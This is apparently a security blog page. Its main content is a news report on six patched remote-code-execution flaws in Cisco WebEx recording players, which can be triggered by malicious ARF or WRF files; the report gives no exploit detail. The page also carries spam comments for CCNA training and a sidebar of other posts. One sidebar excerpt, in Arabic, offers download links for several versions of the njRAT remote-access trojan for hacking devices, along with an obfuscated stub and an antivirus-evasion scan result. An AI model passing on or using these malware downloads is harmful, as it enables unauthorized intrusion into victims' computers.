Triggered via malicious files, flaws in Cisco WebEx players can lead to RCE



Cisco has plugged six security holes in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files that could be exploited by remote attackers to execute malicious code on a target system.
Cisco WebEx flaws
“The ARF and WRF file formats are used to store WebEx meeting recordings that have been recorded on a WebEx meeting site, or on the computer of an online meeting attendee,” the company explained.
“The Cisco WebEx players are applications that are used to play back WebEx meeting recordings that have been recorded by an online meeting attendee. The player can be automatically installed when the user accesses a recording file that is hosted on a WebEx server.”

Vulnerability exploitation

Exploitation of the vulnerabilities can be triggered via malicious ARF or WRF files. Attackers can send such a file as an attachment, or provide a link to it in an email. In both cases, they have to convince users to download and open the malicious file.
The company made sure to note that the vulnerabilities can’t be triggered by users who are attending a WebEx meeting.
Users of Cisco WebEx Business Suite, Cisco WebEx Meetings, and Cisco WebEx Meeting Server should check whether their installations are vulnerable and implement the provided security updates (if they haven’t by now made sure to receive automatic software updates). Instructions on how to do so are provided in the security advisory.
The good news is that vulnerabilities were discovered and reported by security researchers, and there is currently no indication that they are being exploited in the wild.
But, with their existence having now been made public, attackers could quickly move to create exploits and target businesses, so updating the software to the latest release as soon as possible is advisable.
There are no workarounds for these issues, Cisco added. The only thing left to do if you can’t upgrade is to remove all WebEx software completely from a system.

Comments

  1. velrajDecember 14, 2018 at 9:12 PM

    i read the above notes and clarify my doubts very well.in this information i observe lot of things about how to study.........thanks a lot
    top 10 ccna training institute in chennai
    ccna training institute in coimbatore
    ccna Training Institute in Bangalore
    ccna training in madurai

    ReplyDelete
  2. velrajDecember 14, 2018 at 9:14 PM

    This comment has been removed by the author.

    ReplyDelete

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more